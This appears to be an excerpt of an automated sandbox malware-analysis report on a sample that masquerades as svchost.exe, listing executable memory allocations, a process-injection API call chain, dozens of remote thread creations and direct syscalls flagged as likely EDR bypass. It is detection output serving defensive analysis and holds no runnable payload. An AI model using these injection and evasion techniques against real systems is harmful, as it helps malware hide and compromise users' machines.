    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2960000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2220000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 760000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2560000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2540000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2810000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1400000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 930000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2330000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F20000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2880000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: F80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2AE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2740000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2930000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1570000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 26B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 27B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 520000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3060000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D00000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3070000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2250000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D0000 protect: page execute and read and writeJump to behavior
    Contains functionality to inject threads in other processes
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,1_2_00401670
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,1_2_02CB4CC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F84CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_02F84CC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02574CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_02574CC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025E4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,8_2_025E4CC0
    Creates a thread in another existing process (thread injection)
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 15E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 23F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2521360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2E41360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2481360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2541360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 22D1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2E41360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 891360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 14F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2CC1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: FE1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 3151360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2061360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 2D31360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe EIP: 1271360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2341360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1201360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 28F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 24A1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3081360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2FA1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D01360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2741360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 741360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2551360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EC1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 801360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2611360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1061360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1011360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 13F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 22E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2391360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2261360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2951360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2861360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2711360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 901360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 25E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2961360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2221360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BE1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 761360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 10C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 28F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2561360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2FF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2541360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8D1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2811360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11D1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1401360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AC1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 14F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 28E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2E81360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 23E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 931360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 25C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2331360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D91360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F21360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2881360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2C71360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D61360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F81360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2AE1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 30E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2741360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2931360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1571360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 26B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2FA1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 27B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 23C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 521360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 24E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3061360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D01360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D81360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2DF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EB1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3071360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2C61360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D71360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2251360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2FB1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EA1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8D1360Jump to behavior
    Found direct / indirect Syscall (likely to bypass EDR)
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtClose: Direct from: 0x76F02B6C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtSetInformationThread: Direct from: 0x76F02B4C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQuerySystemInformation: Direct from: 0x76F048CC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtOpenSection: Direct from: 0x76F02E0C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtSetInformationThread: Direct from: 0x76EF63F9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtCreateFile: Direct from: 0x76F02FEC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtOpenFile: Direct from: 0x76F02DCC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtSetInformationThread: Direct from: 0x76F02ECC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQueryInformationToken: Direct from: 0x76F02CAC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtSetTimerEx: Direct from: 0x76EF7B2E
